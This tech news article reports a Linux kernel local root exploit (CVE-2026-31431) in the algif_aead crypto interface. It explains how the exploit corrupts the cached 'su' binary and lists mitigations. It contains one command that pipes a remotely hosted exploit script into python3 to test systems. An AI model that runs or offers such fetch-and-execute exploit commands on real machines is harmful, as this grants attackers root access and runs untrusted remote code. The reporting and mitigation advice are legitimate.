Linux exploit instantly grants administrator access on most distributions since 2017 — cryptography optimization snafu grants root privileges to local users

It is quite an interesting patch week for Linux systems administrators out there. Researchers at Xint Code have discovered a nasty exploit that instantly grants root access to any local unprivileged user, a nightmare scenario for multi-user servers of various types, including web servers, container environments like Kubernetes, CI/CD pipelines, and more.

The CVE-2026-31431 exploit affects pretty much every Linux distro currently in use and has existed since 2017. Although it's not a zero-day and the kernel has already gotten a patch, the short disclosure window gave distro makers relatively little time to react. Affected variants include (but aren't limited to) Ubuntu 24 (version 26 was just released last week), RHEL 10, Suse 16, and Amazon Linux 2023. Even Windows' WSL2 is affected, and all it takes is 732 bytes to do it.

To check that a system is vulnerable, you can just run "curl https://copy.fail/exp | python3 && su" with a standard unprivileged account — though we should note that you're trusting an online script. The source code for the proof-of-concept is available here if you prefer. If your distro doesn't have a patch available yet, you can try one of two mitigation methods.

Article continues below

If your kernel loads algif_aaed as a module, a simple [ echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf ] will suffice. Some distributions, however, compile that functionality right into the kernel core, including RHEL and WSL2. That means that in those instances, you'll have to resort to disallowing users from opening AF_ALG sockets to begin with, via seccomp profiles, AppArmor, or SELinux.

Although the Xint Code security team didn't provide a rationale for publicly disclosing the vulnerability so early, they did mention that they found it with the help of an AI assistant. Given that the source code for the Linux kernel is by definition public, in theory, any serious attacker would find it just as easily. Perhaps the fast reveal was an unfortunate necessity.

As for the exploit mechanism itself, it's fairly devious. AF_ALG is a socket that an application can use to have data encrypted or decrypted by providing it with the data to be and a tag. To perform the attack, you provide a splice of an executable you have access to as the tag; the most obvious one being "su".

The "algif_aead" kernel function, crucially, has an internal optimization that doesn't make a copy of the data to encrypt and copy back; rather, it chains the tag data directly onto the output buffer by reference instead of copying it. As a coincidence, the "authencesn" encryption algorithm involves writing 4 bytes at a fixed offset in its output buffer. Since the tag you spliced — the page data for "su" — is now part of that output, those bytes will get written directly into the kernel's cached copy of the executable.

When you call the executable, it'll be joyfully corrupted, granting administrator access. This all happens in memory, too, so there are no detectable disk writes, and the exploit will also get past many security suites.

Follow Tom's Hardware on Google News, or add us as a preferred source, to get our latest news, analysis, & reviews in your feeds.